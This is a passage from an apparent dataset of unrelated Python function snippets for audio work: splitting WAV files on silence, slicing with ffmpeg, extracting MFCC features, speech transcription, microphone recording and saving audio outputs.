save_all_chunks_with_labels(audio_dir, json_dir, csv_dir):\n for file in os.listdir(json_dir):\n file_path = os.path.join(json_dir, file)\n audio_file_path = os.path.join(audio_dir, file)[:-4] + \"wav\"\n with open(file_path) as f:\n data = json.load(f)\n save_arrays_with_labels(audio_file_path, data, csv_dir)", "def split_multiple_recordings_file(file_path, min_silence_duration=0.25, noise_threshold=150):\n print(file_path)\n rate, audio = scipy.io.wavfile.read(file_path)\n split_recordings = split_multiple_recordings(audio, min_silence_duration=min_silence_duration,\n noise_threshold=noise_threshold, sample_rate_hz=rate)\n\n if file_path.count('.') != 1:\n raise Exception('File_path must contain exactly one period, usually in extension. 
IE: /home/test.wav')\n\n for idx, recording in enumerate(split_recordings):\n print(\"splitting \" + file_path)\n new_file_path = file_path.split('.')[0] + '_' + str(idx) + \".wav\"\n scipy.io.wavfile.write(new_file_path, rate, recording)", "def slice_recording(path_recording, path_metadata_filepath_duration):\n\n metadata_filepath_duration = open(path_metadata_filepath_duration, 'r')\n\n start = 0.0\n\n for line in metadata_filepath_duration:\n filepath, duration = line.split(\" | \")\n target_filepath = re.sub('/Mixtures/', '/mic_recordings/Mixtures/', filepath)\n target_parentpath = re.sub('/mixture.wav', '', target_filepath)\n\n # creating folder if the folder does not exist\n try:\n os.makedirs(target_parentpath)\n except OSError as exception:\n if exception.errno == errno.EEXIST and os.path.isdir(target_parentpath):\n pass\n\n delta_t = float(duration)\n\n # calling ffmpeg to slice the wav file into its respective sizes\n subprocess.call([\"ffmpeg\", \"-i\", path_recording, \"-ss\", str(start), \"-t\", str(delta_t), \"-acodec\", \"copy\", target_filepath])\n\n # resetting the start for next file in line\n start += delta_t\n\n metadata_filepath_duration.close()", "def get_large_audio_transcription(path):\n # open the audio file using pydub\n r = sr.Recognizer()\n sound = AudioSegment.from_mp3(path)\n sound.export(\"tmp.wav\", format=\"wav\")\n sound = AudioSegment.from_wav('tmp.wav')\n # split audio sound where silence is 700 milliseconds or more and get chunks\n chunks = split_on_silence(sound,\n # experiment with this value for your target audio file\n min_silence_len = 500,\n # adjust this per requirement\n silence_thresh = sound.dBFS-14,\n # keep the silence for 1 second, adjustable as well\n keep_silence=500,\n )\n folder_name = \"audio-chunks\"\n # create a directory to store the audio chunks\n if not os.path.isdir(folder_name):\n os.mkdir(folder_name)\n whole_text = \"\"\n\n chapter=(str(path.split('/')[-1])).split('_')[3]\n # if chapter == '01':\n # target=2\n # else:\n # target=1\n target=2\n # process each chunk\n for i, audio_chunk in enumerate(chunks, start=1):\n # export audio chunk and save it in\n # the `folder_name` directory.\n if i==1:\n chunk_filename = os.path.join(folder_name, f\"chunk{i}.wav\")\n audio_chunk.export(chunk_filename, format=\"wav\")\n # recognize the chunk\n with sr.AudioFile(chunk_filename) as source:\n audio_listened = r.record(source)\n # try converting it to text\n try:\n text = r.recognize_google(audio_listened,language=\"en-US\")\n\n except sr.UnknownValueError as e:\n print(\"Error:\", str(e))\n else:\n #text = f\"{text.capitalize()}. \"\n #print(chunk_filename, \":\", text)\n whole_text += text\n # return the text for all chunks detected\n else:\n chunk_filename = os.path.join(folder_name, f\"chunk{i}.wav\")\n audio_chunk.export(chunk_filename, format=\"wav\")\n # recognize the chunk\n with sr.AudioFile(chunk_filename) as source:\n audio_listened = r.record(source)\n # try converting it to text\n try:\n text = r.recognize_google(audio_listened, language=\"en-US\")\n\n except sr.UnknownValueError as e:\n print(\"Error:\", str(e))\n else:\n #text = f\"{text.capitalize()}. 
\"\n # print(chunk_filename, \":\", text)\n if chapter == '01':\n whole_text += ' ' +text\n if str(text).isalnum():\n if str(text).split(' ')[0]==' ':\n whole_text += text\n else: whole_text += ' '+text\n # return the text for all chunks detected\n\n if i==target:\n break\n if os.path.isfile('tmp.wav') :os.remove('tmp.wav')\n subprocess.run([\"rm\", \"-rf\", folder_name])\n return whole_text", "def save_separated_audio(self, audios, filename):\n\n # Create folder with mixture name\n folder_path = os.path.join(self.config[\"separated_audio_folder\"], os.path.splitext(filename)[0])\n os.makedirs(folder_path)\n # Save each separated source\n for class_idx, audio in enumerate(audios):\n librosa.output.write_wav(os.path.join(folder_path, self.data_set.classes[class_idx]) + '.wav',\n audio.T,\n sr=self.data_set.config[\"sampling_rate\"])\n # Also copy the mixture in the folder\n copyfile(self.data_set.audio_full_filename(filename), os.path.join(folder_path, \"original_mix.wav\"))", "def segment_10s(audio, sr):\n seg_files = {}\n n_seg = int((len(audio)/sr)/10)\n for i in range(n_seg):\n segment = audio[10*i*sr:(i+1)*10*sr]\n seg_files[i] = segment\n return seg_files", "def write_audio_segment(self, data):\n cache_name = self.CACHE_FILE_NAME + str(time.time()) + '.wav'\n file = open(cache_name, \"wb\")\n file.write(data)\n file.close()\n return cache_name", "def audio_file_save(folder_path, current_time, data, name_by_date):\r\n\r\n name_by_time = current_time + '.wav' #timestamp for the audio file name\r\n usage = disk_usage(folder_path)\r\n if usage.used / usage.total < args.storage_threshold:\r\n file_path = os.path.join(folder_path, name_by_time)\r\n\r\n if args.resampling:\r\n sampling_rate = args.resampling_rate\r\n audio = audio_resampling(data)\r\n else:\r\n sampling_rate = args.recording_samplerate\r\n audio = data\r\n\r\n sf.write(file_path , audio, sampling_rate)\r\n\r\n else:\r\n name = os.path.join(folder_path, name_by_date + '.txt')\r\n f = open(name, 'a')\r\n f.write(current_time + '\\t Activity Detected \\n')\r\n f.close()", "def save_sample(file_path, sampling_rate, audio):\n audio = (audio.numpy() * 32768).astype(\"int16\")\n write(file_path, sampling_rate, audio)", "def make_profiles(datafolder, profilefolder, size):\n files = os.listdir(datafolder) \n for file in files:\n languagename = file.split(\"-\")[0]\n encodering = file.split(\"-\")[1]\n bestand = open('training/' + file,'r' , encoding=encodering) #Reads with the correct encoding.\n test = langdetect.trigram_table(bestand.read(), size) #Creates a ngram table of the content of the file.\n filename = languagename + '.' 
+ str(size) + '.txt' #Creates a new filename.\n newfile = open('trigram-models/' + filename, 'w', encoding=\"utf-8\") \n langdetect.write_trigrams(test, 'trigram-models/' + filename) #Creates a new file with the ngrams and their frequency.\n newfile.close()", "def preprocess_dataset(dataset_path, SAMPLES_TO_CONSIDER: int, num_mfcc = 13, n_fft = 2048, hop_length = 512):\r\n\r\n data = {\r\n 'mapping': [],\r\n 'labels': [],\r\n 'MFCCs': [],\r\n 'files': []\r\n }\r\n\r\n # loop through all sub-dirs\r\n total_samples = 0\r\n valid_samples = 0\r\n for i, (dirpath, dirname, filenames) in tqdm(enumerate(os.walk(dataset_path))):\r\n\r\n # ensure we're at sub-folder level\r\n if dirpath is not dataset_path:\r\n # save label (i.e., sub-folder name) in the mapping\r\n label = dirpath.partition('speech_commands_subset')[-1][1:]\r\n\r\n data['mapping'].append(label)\r\n print(\"\\nProcessing: '{}'\".format(label))\r\n print(\"number of files for each class: \", len(filenames))\r\n # process all audio files\r\n for f in filenames:\r\n total_samples += 1\r\n file_path = os.path.join(dirpath, f)\r\n\r\n # load audio file and slice it to ensure length consistency among different files\r\n signal, sample_rate = librosa.load(file_path)\r\n # print(signal.shape)\r\n # print(type(signal[0]))\r\n\r\n # drop audio files with less than pre-decided number of samples\r\n if len(signal) >= SAMPLES_TO_CONSIDER:\r\n valid_samples += 1\r\n # ensure consistency of the length of the signal\r\n signal = signal[:SAMPLES_TO_CONSIDER]\r\n\r\n # extract MFCCs\r\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc = num_mfcc, n_fft = n_fft, \r\n hop_length = hop_length) \r\n # print(MFCCs.shape)\r\n # print(type(MFCCs[0,0]))\r\n\r\n # store data for analysed track\r\n data['MFCCs'].append(MFCCs.T.tolist())\r\n data['labels'].append(i-1)\r\n # data['files'].append(file_path)\r\n # print(\"{}: {}\".format(file_path, i-1))\r\n\r\n # if valid_samples == 20:\r\n # valid_samples =0\r\n # break\r\n print(\"\\ntotal samples: \", total_samples)\r\n print(\"\\nvalid_samples: \", valid_samples)\r\n\r\n \r\n return data", "def split_on_silence_threshold(wav_file, dest_dir):\n # Read the file\n audioSegment = AudioSegment.from_wav(wav_file)\n # Calculating the silence threshold\n # Normalizing the audio file belfore finding the threshold\n full_audio_wav = normalize(audioSegment)\n loudness_ms_list = [] # Save the audio levels of all the chunks\n for ms_chunk in full_audio_wav:\n loudness_ms_list.append(round(ms_chunk.dBFS))\n print(\"Audio levels are recorded\", file=sys.stderr)\n # Using pandas df for easier manipulation\n df = pd.DataFrame(loudness_ms_list)\n df[0] = df[df[0] != float(\"-inf\")] # Remove the very low levels\n st = df[0].mean()\n st = st if st < -16 else -16 # Because -16db is default\n # Splits the audio if silence duration is MSL long\n MSL = 500 # minimum silence length in ms\n chunks = split_on_silence(\n full_audio_wav, \n # split on silences longer than 500ms (500ms)\n min_silence_len=MSL, \n # anything under -16 dBFS is considered silence\n silence_thresh=st, \n # keep 200 ms of leading/trailing silence\n keep_silence=200, \n )\n # Saving all the chunks\n print(\"Writing all the files, this may take some time!\", file=sys.stderr)\n for index, chunk in enumerate(chunks):\n chunk_file_name = os.path.join(dest_dir, \"sample_{}.wav\".format(str(index).zfill(10)))\n print(\"Saving the file to \" + chunk_file_name, file=sys.stderr)\n # You can export as mp3 etc, note that it has dependency on ffmpeg\n 
chunk.export(chunk_file_name, format=\"wav\")", "def create_wav_file(self, ):\n\n f_out = open(self.wav_file, 'w')\n u_utt2spk = open(self.utt2spk, 'w')\n for file in glob.glob(self.wav_folder+'/*.wav'):\n base = os.path.basename(file).split('.')[0]\n # write to scp file\n f_out.write(base + '\\t' + file + '\\n')\n u_utt2spk.write(base + '\\t' + 'tts' + '\\n')", "def save_segmentation_samples(self, dest=\"./Datasets/IsophonicsSegmentation.seg\", song_indices=[0, 10, 20, 30, 40, 50, 60, 70], hop_length=512, norm_to_C=False, spectrogram_generator=log_mel_spectrogram, n_frames=500):\n data = []\n chords = []\n gold_targets = []\n # Iterate over all song indices on the input\n for song_ind in song_indices:\n # Prprocess audio\n preprocessed_audio = IsophonicsDataset.preprocess_audio(\n waveform=self.DATA[song_ind].WAVEFORM,\n sample_rate=self.DATA[song_ind].SAMPLE_RATE,\n spectrogram_generator=spectrogram_generator,\n nfft=self.NFFT, hop_length=hop_length,\n norm_to_C=norm_to_C, key=self.KEYS[song_ind].get_first_key()\n ).swapaxes(0,1)\n\n num_samples, _ = preprocessed_audio.shape\n\n # Convert data and chord targets to sequences\n data_in_seqs, targets_in_seqs = Dataset.songs_to_sequences(\n FEATURESs=[preprocessed_audio],\n CHORDs=[self.CHORDS[song_ind]],\n TIME_BINSs=[[float(i)/(float(self.SAMPLE_RATE) / float(hop_length)) for i in range(num_samples)]],\n KEYs=self.KEYS[song_ind].get_first_key(),\n n_frames=n_frames,\n norm_to_C=norm_to_C\n )\n\n # Add song's sequences to lists as a new element\n data.append(data_in_seqs)\n chords.append(targets_in_seqs)\n gold_targets.append(SegmentationCRNN.labels2changes(targets = chords[-1]))\n\n # Save all three np arrays generated in this function .. data, chords, gold_targets aka chord changes\n with lzma.open(dest, \"wb\") as dataset_file:\n pickle.dump((data, chords, gold_targets), dataset_file)\n\n print(\"[INFO] The Isophonics segmentation samples was saved successfully.\")", "def compress_segments(map_, wav_id, file_path, segments, outpath):\n try:\n audio = AudioSegment.from_wav(file_path)\n #print(\"\\nSegments:\", len(segments))\n for _, row in segments.iterrows():\n start = row[2] * 1000\n end = row[3] * 1000\n audio_chunk = audio[start:end]\n save_path = \"{}/{}_chunk_{}_{}.wav\".format(outpath, wav_id, start, end)\n audio_chunk.export(save_path, format='wav')\n compress_file(map_=map_, \n name=row[0],\n save_path=save_path)\n except Exception as e:\n print(\"ERR:\",e)\n print(\"Failed files:\", file_path)", "def create_sample_files(bam_file_name, fractions):\n\n print(\"running sample retreival: \\n\\n\")\n\n sample_folder = \"./%s_sample_stats/\" % bam_file_name.replace(\n \"_mRNA.bam\", \"\")\n\n if not os.path.exists(sample_folder):\n os.mkdir(sample_folder)\n os.chdir(sample_folder)\n else:\n os.chdir(sample_folder)\n print(\"fractions: \", fractions)\n for decimal in fractions:\n print(\"%s: started\" % decimal)\n file_var = \"%s_sample.bam\" % str(decimal).replace(\"0.\", \"\")\n\n # extract sample\n print(bam_file_name, file_var)\n sample_cmd = \"samtools view ../%s -s %s -b -@12 > %s\" % (\n bam_file_name, '{:f}'.format(decimal), file_var)\n print(sample_cmd)\n os.system(sample_cmd)", "def save(self, fname, master_volume=1.):\n \n # first pass - find max amplitude value to normalise output\n vmax = 0.\n for c in range(len(self.out_channels)):\n vmax = max(\n abs(self.out_channels[str(c)].values.max()),\n abs(self.out_channels[str(c)].values.min()),\n vmax\n )\n\n # normalisation for conversion to int32 bitdepth wav\n norm = 
master_volume * (pow(2, 31)-1) / vmax\n\n # setup array to house wav stream data \n chans = np.zeros((self.out_channels['0'].values.size,\n len(self.out_channels)), dtype=\"int32\")\n \n # normalise and collect channels into a list\n for c in range(len(self.out_channels)):\n vals = self.out_channels[str(c)].values\n chans[:,c] = (vals*norm).astype(\"int32\")\n \n # finally combine and write out wav file\n wavfile.write(fname, self.samprate, chans)\n print(f\"Saved {fname}\")", "def save_to_file(\n sources,\n codec='wav', audio_adapter=ffmpeg.FFMPEGProcessAudioAdapter(),\n bitrate='128k', synchronous=True):\n\n # filename = \"chengdu.mp3\"\n pool = Pool()\n tasks = []\n for instrument, data in sources.items():\n path = \"./out/\"+instrument + \".\" + codec\n\n if pool:\n task = pool.apply_async(audio_adapter.save, (\n path,\n data,\n 44100,\n codec,\n bitrate))\n tasks.append(task)\n else:\n audio_adapter.save(path, data, 44100, codec, bitrate)\n if synchronous and pool:\n while len(tasks) > 0:\n task = tasks.pop()\n task.get()\n task.wait(timeout=200)", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def save_stereo(self, fname, master_volume=1.):\n\n if len(self.out_channels) > 2:\n print(\"Warning: sonification has > 2 channels, only first 2 will be used. 
See 'save_combined' method.\")\n \n # first pass - find max amplitude value to normalise output\n # and concatenate channels to list\n vmax = 0.\n channels = []\n for c in range(min(len(self.out_channels), 2)):\n vmax = max(\n abs(self.out_channels[str(c)].values.max()),\n abs(self.out_channels[str(c)].values.min()),\n vmax\n ) / master_volume\n channels.append(self.out_channels[str(c)].values)\n \n wav.write(fname, \n np.column_stack(channels),\n self.samprate, \n scale = (-vmax,vmax),\n sampwidth=3)\n \n print(\"Saved.\")", "def play(sampler, name=\"/Users/Jxie0755/Documents/DXcodings/Learning_Python/CS_61A/week03/mario.wav\", seconds=2):\n out = open(name, \"wb\")\n out.setnchannels(1)\n out.setsampwidth(2)\n out.setframerate(frame_rate)\n t = 0\n while t < seconds * frame_rate:\n sample = sampler(t)\n out.writeframes(encode(sample))\n t = t + 1\n out.close()", "def load_data(self):\r\n if not os.path.exists(self.origin_dir):\r\n raise ValueError(f\"Folder {self.origin_dir} not exists!\")\r\n\r\n # loop folders\r\n listglobs = glob.glob(os.path.join(self.origin_dir)+r\"[0-9]*\")\r\n count = 0\r\n temp = []\r\n for x in listglobs:\r\n\r\n # step1, get speaker id md5\r\n user_id = x.rsplit(\"\\\\\")[-1]\r\n speaker_id = hashlib.md5(user_id.encode(\"utf-8\")).hexdigest()\r\n self.wav_desc[\"speaker_id\"] = speaker_id\r\n print(\"1=>\", x)\r\n\r\n for k in [\"你好小顺\", \"小顺小顺\"]:\r\n paths = os.path.join(x, k)\r\n print(\"2=>\", paths)\r\n # step2, parse speaker info\r\n with open(os.path.join(paths, \"spearker_info.txt\"), 'r', encoding=\"utf-8\") as f:\r\n line = f.readline()\r\n arrs = line.strip().split(\"\\\\t\")\r\n if len(arrs) != 3:\r\n raise ValueError(\"Required three field in speaker_info<id>\\t<gender>\\t<age>\")\r\n self.wav_desc[\"gender\"] = arrs[1].strip(\"<\").rstrip(\">\")\r\n self.wav_desc[\"age\"] = arrs[-1].strip(\"<\").rstrip(\">\")\r\n\r\n # step3, parse wav detailed information\r\n # key: wav_id, value: info_list, [keyword, noise_type, distance, speed,user_id, equipment]\r\n wav_infos_dict = {}\r\n with open(os.path.join(paths, \"wav_desc.txt\"), \"r\", encoding=\"utf-8\") as f:\r\n for line in f.readlines():\r\n arrs = line.strip().split(\"\\\\t\")\r\n wav_infos_dict[arrs[0].strip(\"<\").rstrip(\">\")] = [x.strip(\"<\").rstrip(\">\") for\r\n x in arrs[1:]]\r\n\r\n print(f\"Parse wav info finished find {len(wav_infos_dict)} infos.\")\r\n\r\n # Step4, audio with background noise and without nose, which was back_wav and wav_data folder\r\n for wav_folder in [\"back_wav\", \"wav_data\"]:\r\n audio_lists = glob.glob(os.path.join(paths + f\"\\\\{wav_folder}\", \"*.wav\"))\r\n for xa in audio_lists:\r\n # copy data to\r\n wav_id, user_id = get_wav_name(xa)\r\n # print(wav_id, user_id)\r\n # create md5 id\r\n utt_id = hashlib.md5(xa.encode(\"utf-8\")).hexdigest()\r\n # speaker_id = hashlib.md5(user_id.encode(\"utf-8\")).hexdigest()\r\n # print(utt_id, speaker_id)\r\n # collect all info for an audio\r\n self.wav_desc[\"utt_id\"] = utt_id\r\n infos = wav_infos_dict[wav_id]\r\n if len(infos) != 6:\r\n print(\"==>\", infos)\r\n self.wav_desc[\"keyword_id\"] = self.keywords_dict[infos[0]]\r\n self.wav_desc[\"noise_type\"] = infos[1]\r\n self.wav_desc[\"distance\"] = infos[2]\r\n self.wav_desc[\"record_speed\"] = infos[3]\r\n self.wav_desc[\"speaker_id\"] = speaker_id\r\n self.wav_desc[\"record_equipment\"] = infos[5]\r\n\r\n # record wav information\r\n t_infos = copy.deepcopy(self.wav_desc)\r\n self.all_wavs.append(t_infos)\r\n count += 1\r\n temp.append(utt_id)\r\n\r\n # copy 
data to resource folder\r\n dest = shutil.copy2(xa, os.path.join(self.dest_dir, f\"audios/{utt_id}.wav\"))\r\n set_index = which_set(dest, 20, 30)\r\n self.data_index[set_index].append(t_infos)\r\n\r\n # write wav information into json file\r\n with open(os.path.join(self.dest_dir, \"resources/wav_desc.json\"), \"w\", encoding=\"utf-8\") as f:\r\n json.dump(self.all_wavs, f, ensure_ascii=False, indent=True)\r\n print(f\"total wavs:{count}, total ids:{len(temp)}\")\r\n for set_index in self.data_index.keys():\r\n with open(os.path.join(self.dest_dir, f\"resources/p_{set_index}.json\"), \"w\", encoding=\"utf-8\") as f:\r\n json.dump(self.data_index[set_index], f, ensure_ascii=False, indent=True)\r\n print(f\"Collect {set_index} data total {len(self.data_index[set_index])} samples.\")", "def save_mfcc(dataset_path, json_path, num_mfcc=13, n_fft=2048, hop_length=512, num_segments=5):\n\n # dictionary to store mapping, labels, and MFCCs\n data = {\n \"mapping\": [],\n \"labels\": [],\n \"mfcc\": []\n }\n\n samples_per_segment = int(SAMPLES_PER_TRACK / num_segments)\n num_mfcc_vectors_per_segment = math.ceil(samples_per_segment / hop_length)\n\n # loop through all genre sub-folder\n for i, (dirpath, dirnames, filenames) in enumerate(os.walk(dataset_path)):\n\n # ensure we're processing a genre sub-folder level\n if dirpath is not dataset_path:\n\n # save genre label (i.e., sub-folder name) in the mapping\n semantic_label = dirpath.split(\"/\")[-1]\n data[\"mapping\"].append(semantic_label)\n print(\"\\nProcessing: {}\".format(semantic_label))\n\n # process all audio files in genre sub-dir\n for f in filenames:\n\n # load audio file\n file_path = os.path.join(dirpath, f)\n signal, sample_rate = librosa.load(file_path, sr=SAMPLE_RATE)\n\n # process all segments of audio file\n for d in range(num_segments):\n\n # calculate start and finish sample for current segment\n start = samples_per_segment * d\n finish = start + samples_per_segment\n\n # extract mfcc\n mfcc = librosa.feature.mfcc(signal[start:finish], sample_rate, n_mfcc=num_mfcc, n_fft=n_fft,\n hop_length=hop_length)\n mfcc = mfcc.T\n\n # store only mfcc feature with expected number of vectors\n if len(mfcc) == num_mfcc_vectors_per_segment:\n data[\"mfcc\"].append(mfcc.tolist())\n data[\"labels\"].append(i - 1)\n print(\"{}, segment:{}\".format(file_path, d + 1))\n\n # save MFCCs to json file\n with open(json_path, \"w\") as fp:\n json.dump(data, fp, indent=4)", "def convert(\n album,\n):\n for track in list_dir(album):\n ext = splitext(track)[1]\n if ext != \".mp3\":\n new_track = track.replace(ext, \".mp3\")\n if not exists(new_track):\n track_non_mp3 = AudioSegment.from_file(track, format=ext[1:])\n print(f\"{track} -> {new_track}\")\n track_non_mp3.export(new_track, format=\"mp3\")\n os.remove(track)", "def __init__(self, secs, path, concat=True):\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + \"*.wav\")\n for file in files:\n (sr, samples) = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n\n # Keep track of the duration (in seconds) of our audio clip\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if (secs_loaded >= secs):\n break\n if not concat:\n break\n \n # We're assuming that all files use the same sampling frequency.\n # Truncate audio samples so that we end up with the duration specified.\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn(\"Found fewer than %.2f seconds of audio. 
\"\n \"Returning %.2f seconds of audio.\" % (secs, len(audio) / sr)) \n audio = audio[0:total_samples]\n\n self.audio = audio\n self.sampling_rate = sr", "def direct_record(file_name,\n time,\n chunk = 1024,\n sample_rate = 44100,\n format = pyaudio.paInt16,\n channel = 1):\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = format,\n channels = channel,\n rate = sample_rate,\n input = True,\n frames_per_buffer = chunk)\n\n frames = []\n\n for i in range(0, int(sample_rate / chunk * time)):\n data = stream.read(chunk)\n frames.append(data)\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n data_file = open(file_name, 'wb', chunk)\n data_file.write(b''.join(frames))\n data_file.close()", "def save_arrays_with_labels(audio_path, annotation_dict, csv_dir):\n y, sr = librosa.load(audio_path)\n for key, value in annotation_dict.items():\n key_start, key_end = key.split(\",\")\n key_start = (int)(key_start)\n key_end = (int)(key_end)\n segment_start = (int)((key_start/1000) * sr)\n segment_end = (int)((key_end/1000) * sr)\n wav_segment = y[segment_start:segment_end]\n fname = os.path.join(csv_dir, path_leaf(audio_path))[:-4] + \"_\" + key + \".csv\"\n arr = np.append(wav_segment, value)\n np.savetxt(fname, arr, delimiter=\",\")", "def transcribe(self, paths2audio_files: List[str], batch_size: int = 4) -> List[str]:\n pass", "def remix(self):\n self.original = audio.LocalAudioFile(self.infile)\n #for i, segment in enumerate(self.original.analysis.segments):\n # segment.encode(\"seg_%s.mp3\" % i)\n print \"\\n\\n\\n\"\n loudnesses = [x.timbre[0] for i, x in enumerate(self.original.analysis.segments)]\n brightnesses = [x.timbre[1] for i, x in enumerate(self.original.analysis.segments)]\n flatnesses = [x.timbre[2] for i, x in enumerate(self.original.analysis.segments)]\n attacks = [x.timbre[3] for i, x in enumerate(self.original.analysis.segments)]\n timbre5 = [x.timbre[4] for i, x in enumerate(self.original.analysis.segments)]\n timbre6 = [x.timbre[5] for i, x in enumerate(self.original.analysis.segments)]\n timbre7 = [x.timbre[6] for i, x in enumerate(self.original.analysis.segments)]\n timbre8 = [x.timbre[7] for i, x in enumerate(self.original.analysis.segments)]\n timbre9 = [x.timbre[8] for i, x in enumerate(self.original.analysis.segments)]\n timbre10 = [x.timbre[9] for i, x in enumerate(self.original.analysis.segments)]\n timbre11 = [x.timbre[10] for i, x in enumerate(self.original.analysis.segments)]\n timbre12 = [x.timbre[11] for i, x in enumerate(self.original.analysis.segments)]\n\n print \"AVERAGES\"\n print \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % ('loud','bright','flat','attack','t5','t6','t7','t8','t9','t10','t11','t12')\n print \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (avg(loudnesses),avg(brightnesses),avg(flatnesses),avg(attacks),avg(timbre5),avg(timbre6),avg(timbre7),avg(timbre8),avg(timbre9),avg(timbre10),avg(timbre11),avg(timbre12))\n print\n print \"STDVS\"\n print \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % ('loud','bright','flat','attack','t5','t6','t7','t8','t9','t10','t11','t12')\n print \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (stddev(loudnesses),stddev(brightnesses),stddev(flatnesses),stddev(attacks),stddev(timbre5),stddev(timbre6),stddev(timbre7),stddev(timbre8),stddev(timbre9),stddev(timbre10),stddev(timbre11),stddev(timbre12))\n\n\n print \"\\tLoud\\tBright\\tFlat\\tAttack\\ttim5\\ttim6\\ttim7\\ttim8\\ttim9\\ttim10\\ttim11\\ttim12\"\n for segment in 
self.original.analysis.segments:\n if are_kicks(segment): print \"Kick\",\n elif are_snares(segment): print \"Snar\",\n elif are_hats(segment): print \"Hats\",\n else: print \"else\",\n print \"\\t%s\\t%s\\t%s\\t%s\\t%s\" % (segment.timbre[0], segment.timbre[1], segment.timbre[2], segment.timbre[3], segment.timbre[4])\n\n kicks = self.original.analysis.segments.that(are_kicks)\n #if kicks: kicks.encode('kicks.mp3')\n snares = self.original.analysis.segments.that(are_snares)\n #if snares: snares.encode('snares.mp3')\n hats = self.original.analysis.segments.that(are_hats)\n #if hats: hats.encode('hats.mp3')\n\n # Time to replace\n hat_sample = audio.AudioData(self.sample_path + self.template['hats'], sampleRate=44100, numChannels=2, verbose=False)\n kick_sample = audio.AudioData(self.sample_path + self.template['kick'], sampleRate=44100, numChannels=2, verbose=False)\n snare_sample = audio.AudioData(self.sample_path + self.template['snare'], sampleRate=44100, numChannels=2, verbose=False)\n \n empty = audio.AudioData(ndarray=numpy.zeros(((self.original.sampleRate * self.original.analysis.duration), 2), dtype=numpy.int16), numChannels=2, sampleRate=44100)\n\n last = 0\n for segment in kicks:\n if last + len(kick_sample.data) > segment.start:\n print \"Adding kick at %s\" % segment.start\n empty.data[self.original.sampleRate*segment.start:self.original.sampleRate*segment.start + len(kick_sample.data)] += kick_sample.data\n last = segment.start\n\n last = 0\n for segment in snares:\n if last + len(snare_sample.data) > segment.start:\n print \"Adding snare at %s\" % segment.start\n empty.data[self.original.sampleRate*segment.start:self.original.sampleRate*segment.start + len(snare_sample.data)] += snare_sample.data \n last = segment.start\n for segment in hats:\n if last + len(hat_sample.data) > segment.start:\n print \"Adding hat at %s\" % segment.start\n empty.data[self.original.sampleRate*segment.start:self.original.sampleRate*segment.start + len(hat_sample.data)] += hat_sample.data\n last = segment.start\n\n audio.mix(empty, self.original, 0.5).encode('mixed.mp3')", "def write_audio_to_file(audio: torch.Tensor, sample_id: str = ''):\n global FS_HZ\n assert FS_HZ is not None\n audio_extension = '.wav'\n audio_path = upload_directory + 'sample' + sample_id + audio_extension\n audio_np = audio.cpu().numpy()\n with open(audio_path, 'wb') as f:\n soundfile.write(f,\n audio_np,\n samplerate=FS_HZ)\n return audio_path", "def to_voice(item):\r\n item.seek(0)\r\n item = AudioSegment.from_file(item)\r\n m = io.BytesIO()\r\n m.name = \"voice.ogg\"\r\n item.split_to_mono()\r\n dur = len(item) / 1000\r\n item.export(m, format=\"ogg\", bitrate=\"64k\", codec=\"libopus\")\r\n m.seek(0)\r\n return m, dur", "def output_beat_to_file(file_name, e):\n print(\"Writing to file:\", file_name)\n routine = gp.compile(e,pset)\n with open(file_name+\".raw\",'w') as f:\n for t in range(200000):\n f.write(chr(int(routine(t+1))%256))\n # Now convert to wav\n subprocess.call(SOX_COMMAND + \" \" + file_name + \".raw\" + \" \" + file_name + \".wav\", shell=True)\n subprocess.call(LAME_COMMAND + \" \" + file_name + \".wav\", shell=True)", "def store_samples(self, directory, preprocess_fnc):\n print('Called with', directory)\n out_directory = self._get_directory(preprocess_fnc, directory)\n print('Outdir', out_directory)\n if not os.path.exists(out_directory):\n os.makedirs(out_directory)\n\n print('scanning', os.path.join(self._data_directory, directory))\n\n audio_files = 
list(iglob_recursive(os.path.join(self._data_directory, directory), '*.flac'))\n print('audio files:', len(audio_files), 'from', os.path.join(self._data_directory, directory))\n with Pool(processes=multiprocessing.cpu_count()) as pool:\n transcript_dict = self._transcript_dict\n\n for audio_file in audio_files:\n audio_id = self._extract_audio_id(audio_file)\n transcript_entry = transcript_dict[audio_id]\n transform_args = (audio_file, preprocess_fnc, transcript_entry, out_directory)\n pool.apply_async(SpeechCorpusReader._transform_and_store_sample, transform_args)\n\n pool.close()\n pool.join()", "def start(scale, entry, label, v):\r\n\r\n # The following variables are common across all the 5 different voices selected and so, will only be changed there for space considerations\r\n CHANNELS = 1\r\n RATE = 8000\r\n DURATION = 0\r\n WIDTH = 2\r\n BLOCKLEN = 1024\r\n\r\n if len(\r\n entry.get()) == 0: # can try and get rid of invalid characters when saving file too but that won't be necessary\r\n label['text'] = 'File name cannot be empty!'\r\n else:\r\n DURATION = scale.get()\r\n output_wavfile = entry.get()\r\n\r\n label['text'] = 'You will be recording for ' + str(DURATION) + ' seconds.'\r\n\r\n if v.get() == 1:\r\n voice1(output_wavfile, DURATION, BLOCKLEN, RATE, WIDTH, CHANNELS)\r\n print(\"1\")\r\n elif v.get() == 2:\r\n voice2(output_wavfile, DURATION, BLOCKLEN, RATE, WIDTH, CHANNELS)\r\n print(\"2\")\r\n 